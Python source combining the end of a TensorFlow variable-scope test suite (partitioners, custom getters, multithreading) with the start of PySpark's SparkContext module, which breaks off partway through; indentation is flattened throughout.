@run_inside_wrap_function_in_eager_mode
def testBreaksIfPartitioningChanges(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into3_partitioner, reuse=True):
with self.assertRaisesRegexp(
ValueError,
"Trying to reuse partitioned variable .* but specified partitions "
".* and found partitions .*"):
variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into1_partitioner, reuse=True):
with self.assertRaisesRegexp(
ValueError,
"Trying to reuse partitioned variable .* but specified partitions "
".* and found partitions .*"):
variable_scope.get_variable("name0", shape=(3, 1, 1))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReturnsExistingConcatenatedValueIfReuse(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v_concat = variable_scope.get_variable("name0", shape=(3, 1, 1))
variable_scope.get_variable_scope().reuse_variables()
v_concat_2 = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertEqual(v_concat, v_concat_2)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAllowsReuseWithoutPartitioner(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope("scope0", reuse=True):
v_reused = variable_scope.get_variable("name0")
self.assertEqual(v, v_reused)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPropagatePartitionerOnReopening(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner) as vs:
self.assertEqual(axis0_into2_partitioner, vs.partitioner)
with variable_scope.variable_scope(vs) as vs1:
self.assertEqual(axis0_into2_partitioner, vs1.partitioner)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testScalarIgnoresPartitioner(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=())
self.assertEqual(v.name, "scope0/name0:0")
variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertIn("scope0/name0:0", [x.name for x in variables])
def _testPartitionConcatenatesAlongCorrectAxis(self, use_resource):
def _part_axis_0(**unused_kwargs):
return (2, 1, 1)
def _part_axis_1(**unused_kwargs):
return (1, 2, 1)
with variable_scope.variable_scope("root", use_resource=use_resource):
v0 = variable_scope.get_variable(
"n0", shape=(2, 2, 2), partitioner=_part_axis_0)
v1 = variable_scope.get_variable(
"n1", shape=(2, 2, 2), partitioner=_part_axis_1)
self.assertEqual(v0.get_shape(), (2, 2, 2))
self.assertEqual(v1.get_shape(), (2, 2, 2))
n0_0 = list(v0)[0]
n0_1 = list(v0)[1]
self.assertEqual(n0_0.get_shape(), (1, 2, 2))
self.assertEqual(n0_1.get_shape(), (1, 2, 2))
n1_0 = list(v1)[0]
n1_1 = list(v1)[1]
self.assertEqual(n1_0.get_shape(), (2, 1, 2))
self.assertEqual(n1_1.get_shape(), (2, 1, 2))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPartitionConcatenatesAlongCorrectAxis(self):
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=False)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPartitionConcatenatesAlongCorrectAxisResource(self):
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=True)
class VariableScopeWithCustomGetterTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNonCallableGetterFails(self):
with self.assertRaisesRegexp(ValueError,
r"custom_getter .* not callable:"):
with variable_scope.variable_scope("scope0", custom_getter=3):
variable_scope.get_variable("name0")
with self.assertRaisesRegexp(ValueError,
r"custom_getter .* not callable:"):
variable_scope.get_variable("name0", custom_getter=3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNoSideEffectsWithIdentityCustomGetter(self):
called = [0]
def custom_getter(getter, *args, **kwargs):
called[0] += 1
return getter(*args, **kwargs)
with variable_scope.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope(scope, reuse=True):
v2 = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope("new_scope") as new_scope:
v3 = variable_scope.get_variable("v3", [1])
with variable_scope.variable_scope(
new_scope, reuse=True, custom_getter=custom_getter):
v4 = variable_scope.get_variable("v3", [1])
self.assertEqual(v, v2)
self.assertEqual(v3, v4)
self.assertEqual(3, called[0]) # skipped one in the first new_scope
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSynchronizationAndAggregationWithCustomGetter(self):
called = [0]
synchronization = variable_scope.VariableSynchronization.AUTO
aggregation = variable_scope.VariableAggregation.NONE
def custom_getter(getter, *args, **kwargs):
called[0] += 1
# Verify synchronization and aggregation kwargs are as expected.
self.assertEqual(kwargs["synchronization"], synchronization)
self.assertEqual(kwargs["aggregation"], aggregation)
return getter(*args, **kwargs)
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
variable_scope.get_variable("v", [1])
self.assertEqual(1, called[0])
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
synchronization = variable_scope.VariableSynchronization.ON_READ
aggregation = variable_scope.VariableAggregation.MEAN
variable_scope.get_variable(
"v1", [1], synchronization=synchronization, aggregation=aggregation)
self.assertEqual(2, called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCustomGetterWithReuse(self):
# Custom getter can choose to behave differently on reused variables.
def custom_getter(getter, *args, **kwargs):
var = getter(*args, **kwargs)
if kwargs["reuse"]:
# This can be used, e.g., for changing the caching device if needed.
return array_ops.identity(var, name="reused")
else:
return array_ops.identity(var, name="not_reused")
with variable_scope.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope(scope, reuse=True):
v2 = variable_scope.get_variable("v", [1])
self.assertEqual(v.name, "not_reused:0")
self.assertEqual(v2.name, "reused:0")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Fetch argument <tf.Tensor 'custom_getter/add:0' shape=(1, 2, 3)
# dtype=float32> cannot be interpreted as a Tensor. (Tensor
# Tensor("custom_getter/add:0", shape=(1, 2, 3), dtype=float32) is not an
# element of this graph.)
def testGetterThatCreatesTwoVariablesAndSumsThem(self):
def custom_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/0" % name, *args, **kwargs)
g_1 = getter("%s/1" % name, *args, **kwargs)
with ops.name_scope("custom_getter"):
return g_0 + g_1
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
v = variable_scope.get_variable("v", [1, 2, 3])
self.assertEqual([1, 2, 3], v.get_shape())
true_vars = variables_lib.trainable_variables()
self.assertEqual(2, len(true_vars))
self.assertEqual("scope/v/0:0", true_vars[0].name)
self.assertEqual("scope/v/1:0", true_vars[1].name)
self.assertEqual("custom_getter/add:0", v.name)
with self.cached_session() as sess:
variables_lib.global_variables_initializer().run()
np_vars, np_v = sess.run([true_vars, v])
self.assertAllClose(np_v, sum(np_vars))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Fetch argument <tf.Tensor 'sum_getter_2/add:0' shape=(1, 2, 3)
# dtype=float32> cannot be interpreted as a Tensor. (Tensor
# Tensor("sum_getter_2/add:0", shape=(1, 2, 3), dtype=float32) is not an
# element of this graph.)
def testNestedCustomGetters(self):
def sum_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/sum_0" % name, *args, **kwargs)
g_1 = getter("%s/sum_1" % name, *args, **kwargs)
with ops.name_scope("sum_getter"):
return g_0 + g_1
def prod_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/prod_0" % name, *args, **kwargs)
g_1 = getter("%s/prod_1" % name, *args, **kwargs)
with ops.name_scope("prod_getter"):
return g_0 * g_1
with variable_scope.variable_scope("prod_scope", custom_getter=prod_getter):
with variable_scope.variable_scope("sum_scope", custom_getter=sum_getter):
with variable_scope.variable_scope(
"inner_sum_scope", custom_getter=sum_getter):
# take sums of sums of products
v = variable_scope.get_variable("v", [1, 2, 3])
self.assertEqual([1, 2, 3], v.get_shape())
true_vars = variables_lib.trainable_variables()
self.assertEqual(8, len(true_vars))
template = (
"prod_scope/sum_scope/inner_sum_scope/v/sum_%d/sum_%d/prod_%d:0")
self.assertEqual(template % (0, 0, 0), true_vars[0].name)
self.assertEqual(template % (0, 0, 1), true_vars[1].name)
self.assertEqual(template % (0, 1, 0), true_vars[2].name)
self.assertEqual(template % (0, 1, 1), true_vars[3].name)
self.assertEqual(template % (1, 0, 0), true_vars[4].name)
self.assertEqual(template % (1, 0, 1), true_vars[5].name)
self.assertEqual(template % (1, 1, 0), true_vars[6].name)
self.assertEqual(template % (1, 1, 1), true_vars[7].name)
with self.cached_session() as sess:
variables_lib.global_variables_initializer().run()
np_vars, np_v = sess.run([true_vars, v])
# take products of sums of products
self.assertAllClose(
np_v, (((np_vars[0] * np_vars[1]) + (np_vars[2] * np_vars[3])) + (
(np_vars[4] * np_vars[5]) + (np_vars[6] * np_vars[7]))))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreator(self):
variable_names = []
def creator_a(next_creator, **kwargs):
variable_names.append(kwargs.get("name", ""))
return next_creator(**kwargs)
def creator_b(next_creator, **kwargs):
kwargs["name"] = "forced_name"
return next_creator(**kwargs)
with variable_scope.variable_creator_scope(creator_a):
with variable_scope.variable_creator_scope(creator_b):
variable_scope.variable(1.0, name="one_name")
self.assertAllEqual(variable_names, ["forced_name"])
called = [False]
    def creator_c(next_creator, **kwargs):
called[0] = True
self.assertEqual(kwargs["synchronization"],
variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual(kwargs["aggregation"],
variable_scope.VariableAggregation.MEAN)
return next_creator(**kwargs)
    with variable_scope.variable_creator_scope(creator_c):
variable_scope.get_variable(
"v", [],
synchronization=variable_scope.VariableSynchronization.ON_WRITE,
aggregation=variable_scope.VariableAggregation.MEAN)
self.assertTrue(called[0])
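# Illustrative sketch (not part of the original test suite; `dtypes` would need
# to be imported from tensorflow.python.framework): a custom getter like the
# ones exercised above can, for example, force every variable in a scope to a
# chosen dtype:
#
#   def float64_getter(getter, name, *args, **kwargs):
#     kwargs["dtype"] = dtypes.float64
#     return getter(name, *args, **kwargs)
#
#   with variable_scope.variable_scope("f64", custom_getter=float64_getter):
#     w = variable_scope.get_variable("w", [2, 2])  # created as float64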
class PartitionInfoTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testConstructorChecks(self):
# Invalid arg types.
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=None, var_offset=[0, 1])
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=None)
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape="foo", var_offset=[0, 1])
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset="foo")
# full_shape and var_offset must have same length.
with self.assertRaises(ValueError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=[0])
# Offset must always be less than shape.
with self.assertRaises(ValueError):
variable_scope._PartitionInfo(full_shape=[1, 1], var_offset=[0, 1])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSingleOffset(self):
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
self.assertEqual(4, partition_info.single_offset([1, 3]))
# Tests when the variable isn't partitioned at all.
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[0, 0])
self.assertEqual(0, partition_info.single_offset([9, 3]))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSingleSliceDim(self):
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
# Invalid shape.
with self.assertRaises(TypeError):
partition_info.single_slice_dim(None)
# Rank of shape differs from full_shape.
with self.assertRaises(ValueError):
partition_info.single_slice_dim([1, 2, 3])
# Shape is too large given var_offset (4+6 > 9).
with self.assertRaises(ValueError):
partition_info.single_slice_dim([6, 3])
# Multiple possible slice dim from shape.
with self.assertRaises(ValueError):
partition_info.single_slice_dim([1, 1])
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[0, 0])
self.assertEqual(1, partition_info.single_slice_dim([9, 2]))
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
self.assertEqual(0, partition_info.single_slice_dim([2, 3]))
class VariableScopeMultithreadedTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoThreadsDisjointScopeEntry(self):
def thread_fn(i, graph):
with graph.as_default():
with variable_scope.variable_scope("foo"):
if i == 0:
v = variable_scope.get_variable("v", [])
self.assertEquals("foo/v:0", v.name)
else:
# Any thread after the first one should fail to create variable
# with the same name.
with self.assertRaises(ValueError):
variable_scope.get_variable("v", [])
graph = ops.get_default_graph()
threads = [
threading.Thread(target=thread_fn, args=(
i,
graph,
)) for i in range(2)
]
threads[0].start()
# Allow thread 0 to finish before starting thread 1.
threads[0].join()
threads[1].start()
threads[1].join()
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoThreadsNestedScopeEntry(self):
def thread_fn(i, graph, run_event, pause_event):
with graph.as_default():
with variable_scope.variable_scope("foo"):
if i == 0:
v = variable_scope.get_variable("v", [])
self.assertEquals("foo/v:0", v.name)
else:
# Any thread after the first one should fail to create variable
# with the same name.
with self.assertRaises(ValueError):
variable_scope.get_variable("v", [])
pause_event.set()
run_event.wait()
graph = ops.get_default_graph()
run_events = [threading.Event() for _ in range(2)]
pause_events = [threading.Event() for _ in range(2)]
threads = [
threading.Thread(
target=thread_fn, args=(i, graph, run_events[i], pause_events[i]))
for i in range(2)
]
# Start first thread.
threads[0].start()
pause_events[0].wait()
# Start next thread once the first thread has paused.
threads[1].start()
pause_events[1].wait()
# Resume both threads.
run_events[0].set()
run_events[1].set()
threads[0].join()
threads[1].join()
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterMainScope(self):
def thread_fn(graph, main_thread_scope):
with graph.as_default():
# Variable created with main scope will have prefix "main".
with variable_scope.variable_scope(main_thread_scope):
with variable_scope.variable_scope("foo"):
v = variable_scope.get_variable("v", [])
self.assertEquals("main/foo/v:0", v.name)
# Variable created outside main scope will not have prefix "main".
with variable_scope.variable_scope("bar"):
v = variable_scope.get_variable("v", [])
self.assertEquals("bar/v:0", v.name)
graph = ops.get_default_graph()
with variable_scope.variable_scope("main") as main_thread_scope:
thread = threading.Thread(
target=thread_fn, args=(graph, main_thread_scope))
thread.start()
thread.join()
if __name__ == "__main__":
test.main()
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import os
import shutil
import signal
import sys
import threading
import warnings
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from pyspark import accumulators
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer
from pyspark.storagelevel import StorageLevel
from pyspark.rdd import RDD, _load_from_socket, ignore_unicode_prefix
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
if sys.version > '3':
xrange = range
__all__ = ['SparkContext']
# These are special default configs for PySpark; they will overwrite
# the default ones for Spark if they are not configured by the user.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create L{RDD} and
broadcast variables on that cluster.
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
"""
Create a new SparkContext. At least the master and app name should be set,
either through the named parameters here or through C{conf}.
:param master: Cluster URL to connect to
(e.g. mesos://host:port, spark://host:port, local[4]).
:param appName: A name for your job, to display on the cluster web UI.
:param sparkHome: Location where Spark is installed on cluster nodes.
:param pyFiles: Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
:param environment: A dictionary of environment variables to set on
worker nodes.
:param batchSize: The number of Python objects represented as a single
Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
:param serializer: The serializer for RDDs.
:param conf: A L{SparkConf} object setting Spark properties.
:param gateway: Use an existing gateway and JVM, otherwise a new JVM
will be instantiated.
:param jsc: The JavaSparkContext instance (optional).
:param profiler_cls: A class of custom Profiler used to do profiling
(default is pyspark.profiler.BasicProfiler).
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
self._callsite = first_spark_call() or CallSite(None, None, None)
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in JVM properly, so use conf directly. This represents the
# scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
# created and then stopped, and we create a new SparkConf and new SparkContext again)
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise Exception("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise Exception("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
auth_token = self._gateway.gateway_parameters.auth_token
self._accumulatorServer = accumulators._start_update_server(auth_token)
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port, auth_token)
self._jsc.sc().register(self._javaAccumulator)
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python')
self.pythonVer = "%d.%d" % sys.version_info[:2]
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
try:
filepath = os.path.join(SparkFiles.getRootDirectory(), filename)
if not os.path.exists(filepath):
# In case of YARN with shell mode, 'spark.submit.pyFiles' files are
# not added via SparkContext.addFile. Here we check if the file exists,
# try to copy and then add it to the path. See SPARK-21945.
shutil.copyfile(path, filepath)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, filepath)
except Exception:
warnings.warn(
"Failed to add file [%s] speficied in 'spark.submit.pyFiles' to "
"Python path:\n %s" % (path, "\n ".join(sys.path)),
RuntimeWarning)
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Throws error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise Exception(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
:param conf: SparkConf (optional)
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
return SparkContext._active_spark_context
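    # Usage sketch (illustrative, not executed here): getOrCreate() is the safe
    # way to share a single context across modules, e.g.
    #
    #   conf = SparkConf().setMaster("local[2]").setAppName("shared-app")
    #   sc = SparkContext.getOrCreate(conf)
    #   sc is SparkContext.getOrCreate()  # True -- the same singleton is reused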
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
        Set a Java system property, such as spark.executor.memory. This
        must be invoked before instantiating SparkContext.
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
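    # Illustrative only: system properties must be set before the JVM (and thus
    # the SparkContext) is created, e.g.
    #
    #   SparkContext.setSystemProperty("spark.executor.memory", "2g")
    #   sc = SparkContext("local", "App")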
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
@ignore_unicode_prefix
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
>>> sc.applicationId # doctest: +ELLIPSIS
u'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
pass
finally:
self._jsc = None
if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), increased by `step` every element. Can be called the same
way as python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numSlices: the number of partitions of the new RDD
:return: An RDD of int
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(xrange(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
        Distribute a local Python collection to form an RDD. Using xrange
        is recommended for performance if the input represents a range.
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(xrange(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, xrange):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
return xrange(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
jrdd = self._serialize_to_jvm(c, numSlices, serializer)
return RDD(jrdd, self, serializer)
def _serialize_to_jvm(self, data, parallelism, serializer):
"""
Calling the Java parallelize() method with an ArrayList is too slow,
because it sends O(n) Py4J commands. As an alternative, serialized
        objects are written to a file and loaded through readRDDFromFile().
"""
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
serializer.dump_stream(data, tempFile)
tempFile.close()
readRDDFromFile = self._jvm.PythonRDD.readRDDFromFile
return readRDDFromFile(self._jsc, tempFile.name, parallelism)
finally:
            # readRDDFromFile eagerly reads the file so we can delete right after.
os.unlink(tempFile.name)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using L{RDD.saveAsPickleFile} method.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
